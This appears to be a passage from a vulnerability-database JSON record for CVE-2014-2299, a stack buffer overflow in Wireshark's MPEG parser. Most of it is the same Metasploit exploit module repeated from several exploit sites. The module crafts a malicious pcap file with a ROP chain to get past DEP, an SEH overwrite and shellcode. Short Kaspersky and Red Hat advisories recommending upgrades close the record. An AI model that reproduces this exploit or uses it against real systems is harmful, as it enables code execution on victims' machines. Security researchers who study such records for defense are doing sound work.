&VirtualProtect() [IAT libcares-2.dll]\r\n 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x00000201, # 0x00000201-&#62; ebx\r\n 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] \r\n 0x00000040, # 0x00000040-&#62; edx\r\n 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x668242b9, # &Writable location [libgnutls-26.dll]\r\n 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0\r\n 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]\r\n 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x90909090, # nop\r\n 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n ].flatten.pack(&#34;V*&#34;)\r\n\r\n return rop_gadgets\r\n\r\n end\r\n\r\n def exploit\r\n\r\n print_status(&#34;Creating &#39;#{datastore[&#39;FILENAME&#39;]}&#39; file ...&#34;)\r\n\r\n ropchain = create_rop_chain\r\n magic_header = &#34;\\xff\\xfb\\x41&#34; # mpeg magic_number(MP3) -&#62; http://en.wikipedia.org/wiki/MP3#File_structure\r\n # Here we build the packet data\r\n packet = rand_text_alpha(883)\r\n packet &#60;&#60; &#34;\\x6c\\x7d\\x37\\x6c&#34; # NOP RETN\r\n packet &#60;&#60; &#34;\\x6c\\x7d\\x37\\x6c&#34; # NOP RETN\r\n packet &#60;&#60; ropchain\r\n packet &#60;&#60; payload.encoded # Shellcode\r\n packet &#60;&#60; rand_text_alpha(target[&#39;OffSet&#39;] - 892 - ropchain.length - payload.encoded.length)\r\n\r\n # 0xff is a badchar for this exploit then we can&#39;t make a jump back with jmp $-2000\r\n # After nseh and seh we haven&#39;t space, then we have to jump to another location.\r\n\r\n # When file is open with command line. This is NSEH/SEH overwrite\r\n packet &#60;&#60; make_nops(4) # nseh\r\n packet &#60;&#60; &#34;\\x6c\\x2e\\xe0\\x68&#34; # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN\r\n\r\n packet &#60;&#60; rand_text_alpha(target[&#39;OffSet2&#39;] - target[&#39;OffSet&#39;] - 8) # junk\r\n\r\n # When file is open with GUI interface. This is NSEH/SEH overwrite\r\n packet &#60;&#60; make_nops(4) # nseh\r\n # seh -&#62; # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **\r\n packet &#60;&#60; &#34;\\x55\\x59\\x80\\x6b&#34;\r\n\r\n print_status(&#34;Preparing payload&#34;)\r\n filecontent = magic_header\r\n filecontent &#60;&#60; packet\r\n print_status(&#34;Writing payload to file, &#34; + filecontent.length.to_s()+&#34; bytes&#34;)\r\n file_create(filecontent)\r\n\r\n end\r\nend\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86324"}], "zdt": [{"lastseen": "2018-01-11T05:35:33", "bulletinFamily": "exploit", "description": "This Metasploit module triggers a stack buffer overflow in Wireshark versions 1.8.12/1.10.5 and below by generating an malicious file.", "modified": "2014-04-26T00:00:00", "published": "2014-04-26T00:00:00", "id": "1337DAY-ID-22187", "href": "https://0day.today/exploit/description/22187", "type": "zdt", "title": "Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow", "sourceData": "#\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Remote::Seh\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\r\n by generating an malicious file.)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Wesley Neelen', # Discovery vulnerability\r\n 'j0sm1', # Exploit and msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-2299'],\r\n [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],\r\n [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],\r\n [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\xff\",\r\n 'Space' => 600,\r\n 'DisableNops' => 'True',\r\n 'PrependEncoder' => \"\\x81\\xec\\xc8\\x00\\x00\\x00\" # sub esp,200 \r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'WinXP SP3 Spanish (bypass DEP)',\r\n {\r\n 'OffSet' => 69732,\r\n 'OffSet2' => 70476,\r\n 'Ret' => 0x1c077cc3, # pop/pop/ret -> \"c:\\Program Files\\Wireshark\\krb5_32.dll\" (version: 1.6.3.16) \r\n 'jmpesp' => 0x68e2bfb9,\r\n }\r\n ],\r\n [ 'WinXP SP2/SP3 English (bypass DEP)',\r\n {\r\n 'OffSet2' => 70692,\r\n 'OffSet' => 70476,\r\n 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module\r\n 'jmpesp' => 0x68e2bfb9,\r\n }\r\n ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Mar 20 2014'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),\r\n ], self.class)\r\n end\r\n\r\n def create_rop_chain()\r\n\r\n # rop chain generated with mona.py - www.corelan.be\r\n rop_gadgets = \r\n [\r\n 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]\r\n 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x00000201, # 0x00000201-> ebx\r\n 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] \r\n 0x00000040, # 0x00000040-> edx\r\n 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x668242b9, # &Writable location [libgnutls-26.dll]\r\n 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0\r\n 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]\r\n 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x90909090, # nop\r\n 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n ].flatten.pack(\"V*\")\r\n\r\n return rop_gadgets\r\n\r\n end\r\n\r\n def exploit\r\n\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n ropchain = create_rop_chain\r\n magic_header = \"\\xff\\xfb\\x41\" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure\r\n # Here we build the packet data\r\n packet = rand_text_alpha(883)\r\n packet << \"\\x6c\\x7d\\x37\\x6c\" # NOP RETN\r\n packet << \"\\x6c\\x7d\\x37\\x6c\" # NOP RETN\r\n packet << ropchain\r\n packet << payload.encoded # Shellcode\r\n packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)\r\n\r\n # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000\r\n # After nseh and seh we haven't space, then we have to jump to another location.\r\n\r\n # When file is open with command line. This is NSEH/SEH overwrite\r\n packet << make_nops(4) # nseh\r\n packet << \"\\x6c\\x2e\\xe0\\x68\" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN\r\n\r\n packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk\r\n\r\n # When file is open with GUI interface. This is NSEH/SEH overwrite\r\n packet << make_nops(4) # nseh\r\n # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **\r\n packet << \"\\x55\\x59\\x80\\x6b\"\r\n\r\n print_status(\"Preparing payload\")\r\n filecontent = magic_header\r\n filecontent << packet\r\n print_status(\"Writing payload to file, \" + filecontent.length.to_s()+\" bytes\")\r\n file_create(filecontent)\r\n\r\n end\r\nend\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22187"}], "exploitdb": [{"lastseen": "2016-02-03T18:24:54", "bulletinFamily": "exploit", "description": "Wireshark. CVE-2014-2299. Local exploit for windows platform", "modified": "2014-04-28T00:00:00", "published": "2014-04-28T00:00:00", "id": "EDB-ID:33069", "href": "https://www.exploit-db.com/exploits/33069/", "type": "exploitdb", "title": "Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow", "sourceData": "# Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer\r\nOverflow\r\n# Date: 24/04/2014\r\n# Exploit Author: j0sm1\r\n# Vendor Homepage: www.wireshark.org\r\n# Software Link: http://wireshark.askapache.com/download/win32/all-versions/\r\n# Version: < 1.8.12/1.10.5\r\n# Tested on: Windows XP SP3\r\n# CVE : cve-2014-2299\r\n\r\n# Metasploit URL module:\r\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb\r\n\r\n#\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Remote::Seh\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\r\n by generating an malicious file.)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n\t 'Wesley Neelen', # Discovery vulnerability\r\n 'j0sm1', # Exploit and msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-2299'],\r\n [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],\r\n [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],\r\n [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\xff\",\r\n 'Space' => 600,\r\n 'DisableNops' => 'True',\r\n 'PrependEncoder' => \"\\x81\\xec\\xc8\\x00\\x00\\x00\" # sub esp,200 \r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'WinXP SP3 Spanish (bypass DEP)',\r\n {\r\n 'OffSet' => 69732,\r\n 'OffSet2' => 70476,\r\n 'Ret' => 0x1c077cc3, # pop/pop/ret -> \"c:\\Program Files\\Wireshark\\krb5_32.dll\" (version: 1.6.3.16) \r\n 'jmpesp' => 0x68e2bfb9,\r\n }\r\n ],\r\n\t [ 'WinXP SP2/SP3 English (bypass DEP)',\r\n {\r\n 'OffSet2' => 70692,\r\n 'OffSet' => 70476,\r\n 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module\r\n 'jmpesp' => 0x68e2bfb9,\r\n }\r\n ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Mar 20 2014'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),\r\n ], self.class)\r\n end\r\n\r\n def create_rop_chain()\r\n\r\n # rop chain generated with mona.py - www.corelan.be\r\n rop_gadgets = \r\n [\r\n 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]\r\n 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x00000201, # 0x00000201-> ebx\r\n 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] \r\n 0x00000040, # 0x00000040-> edx\r\n 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x668242b9, # &Writable location [libgnutls-26.dll]\r\n 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0\r\n 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]\r\n 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n 0x90909090, # nop\r\n 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \r\n ].flatten.pack(\"V*\")\r\n\r\n return rop_gadgets\r\n\r\n end\r\n\r\n def exploit\r\n\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n ropchain = create_rop_chain\r\n magic_header = \"\\xff\\xfb\\x41\" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure\r\n # Here we build the packet data\r\n packet = rand_text_alpha(883)\r\n packet << \"\\x6c\\x7d\\x37\\x6c\" # NOP RETN\r\n packet << \"\\x6c\\x7d\\x37\\x6c\" # NOP RETN\r\n packet << ropchain\r\n packet << payload.encoded # Shellcode\r\n packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)\r\n\r\n # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000\r\n # After nseh and seh we haven't space, then we have to jump to another location.\r\n\r\n # When file is open with command line. This is NSEH/SEH overwrite\r\n packet << make_nops(4) # nseh\r\n packet << \"\\x6c\\x2e\\xe0\\x68\" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN\r\n\r\n packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk\r\n\r\n # When file is open with GUI interface. This is NSEH/SEH overwrite\r\n packet << make_nops(4) # nseh\r\n # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **\r\n packet << \"\\x55\\x59\\x80\\x6b\"\r\n\r\n print_status(\"Preparing payload\")\r\n filecontent = magic_header\r\n filecontent << packet\r\n print_status(\"Writing payload to file, \" + filecontent.length.to_s()+\" bytes\")\r\n file_create(filecontent)\r\n\r\n end\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33069/"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:16", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-25T00:00:00", "published": "2014-04-25T00:00:00", "href": "https://packetstormsecurity.com/files/126337/Wireshark-1.8.12-1.10.5-wiretap-mpeg.c-Stack-Buffer-Overflow.html", "id": "PACKETSTORM:126337", "type": "packetstorm", "title": "Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow", "sourceData": "`# \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow', \n'Description' => %q{ \nThis module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 \nby generating an malicious file.) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Wesley Neelen', # Discovery vulnerability \n'j0sm1', # Exploit and msf module \n], \n'References' => \n[ \n[ 'CVE', '2014-2299'], \n[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ], \n[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ], \n[ 'URL', 'http://www.securityfocus.com/bid/66066/info' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'BadChars' => \"\\xff\", \n'Space' => 600, \n'DisableNops' => 'True', \n'PrependEncoder' => \"\\x81\\xec\\xc8\\x00\\x00\\x00\" # sub esp,200 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'WinXP SP3 Spanish (bypass DEP)', \n{ \n'OffSet' => 69732, \n'OffSet2' => 70476, \n'Ret' => 0x1c077cc3, # pop/pop/ret -> \"c:\\Program Files\\Wireshark\\krb5_32.dll\" (version: 1.6.3.16) \n'jmpesp' => 0x68e2bfb9, \n} \n], \n[ 'WinXP SP2/SP3 English (bypass DEP)', \n{ \n'OffSet2' => 70692, \n'OffSet' => 70476, \n'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module \n'jmpesp' => 0x68e2bfb9, \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Mar 20 2014' \n)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']), \n], self.class) \nend \n \ndef create_rop_chain() \n \n# rop chain generated with mona.py - www.corelan.be \nrop_gadgets = \n[ \n0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] \n0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n0x00000201, # 0x00000201-> ebx \n0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] \n0x00000040, # 0x00000040-> edx \n0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n0x668242b9, # &Writable location [libgnutls-26.dll] \n0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 \n0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] \n0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n0x90909090, # nop \n0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] \n].flatten.pack(\"V*\") \n \nreturn rop_gadgets \n \nend \n \ndef exploit \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nropchain = create_rop_chain \nmagic_header = \"\\xff\\xfb\\x41\" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure \n# Here we build the packet data \npacket = rand_text_alpha(883) \npacket << \"\\x6c\\x7d\\x37\\x6c\" # NOP RETN \npacket << \"\\x6c\\x7d\\x37\\x6c\" # NOP RETN \npacket << ropchain \npacket << payload.encoded # Shellcode \npacket << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) \n \n# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000 \n# After nseh and seh we haven't space, then we have to jump to another location. \n \n# When file is open with command line. This is NSEH/SEH overwrite \npacket << make_nops(4) # nseh \npacket << \"\\x6c\\x2e\\xe0\\x68\" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN \n \npacket << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk \n \n# When file is open with GUI interface. This is NSEH/SEH overwrite \npacket << make_nops(4) # nseh \n# seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** \npacket << \"\\x55\\x59\\x80\\x6b\" \n \nprint_status(\"Preparing payload\") \nfilecontent = magic_header \nfilecontent << packet \nprint_status(\"Writing payload to file, \" + filecontent.length.to_s()+\" bytes\") \nfile_create(filecontent) \n \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126337/wireshark_mpeg_overflow.rb.txt"}], "metasploit": [{"lastseen": "2020-04-08T04:08:51", "bulletinFamily": "exploit", "description": "This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.\n", "modified": "1976-01-01T00:00:00", "published": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/WIRESHARK_MPEG_OVERFLOW", "href": "", "type": "metasploit", "title": "Wireshark wiretap/mpeg.c Stack Buffer Overflow", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb"}], "kaspersky": [{"lastseen": "2019-03-21T00:14:18", "bulletinFamily": "info", "description": "### *Detect date*:\n03/07/2014\n\n### *Severity*:\nCritical\n\n### *Description*:\nBuffer overflow vulnerabilities were found in Wireshark. By exploiting these vulnerabilities malicious users can cause denial of service or execute arbitrary code. These vulnerabilities can be exploited remotely via a specially designed packet trace.\n\n### *Affected products*:\nWireshark 1.10 versions earlier than 1.10.6.0 \nWireshark 1.8 versions earlier than 1.8.13\n\n### *Solution*:\nUpdate to the latest version \n[Get Wireshark](<https://www.wireshark.org/download.html>)\n\n### *Original advisories*:\n[WNPA advisory](<https://www.wireshark.org/security/wnpa-sec-2014-04.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Wireshark](<https://threats.kaspersky.com/en/product/Wireshark/>)\n\n### *CVE-IDS*:\n[CVE-2014-2299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2299>)9.3Critical", "modified": "2019-03-07T00:00:00", "published": "2014-03-07T00:00:00", "id": "KLA10588", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10588", "title": "\r KLA10588Multiple vulnerabilities in Wireshark ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:03", "bulletinFamily": "unix", "description": "Wireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nMultiple flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash or,\npossibly, execute arbitrary code as the user running Wireshark.\n(CVE-2013-3559, CVE-2013-4083, CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2012-5595, CVE-2012-5598, CVE-2012-5599,\nCVE-2012-5600, CVE-2012-6056, CVE-2012-6060, CVE-2012-6061, CVE-2012-6062,\nCVE-2013-3557, CVE-2013-4081, CVE-2013-4927, CVE-2013-4931, CVE-2013-4932,\nCVE-2013-4933, CVE-2013-4934, CVE-2013-4935, CVE-2013-5721, CVE-2013-7112)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n", "modified": "2017-09-08T11:52:10", "published": "2014-03-31T04:00:00", "id": "RHSA-2014:0341", "href": "https://access.redhat.com/errata/RHSA-2014:0341", "type": "redhat", "title": "(RHSA-2014:0341) Moderate: wireshark security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}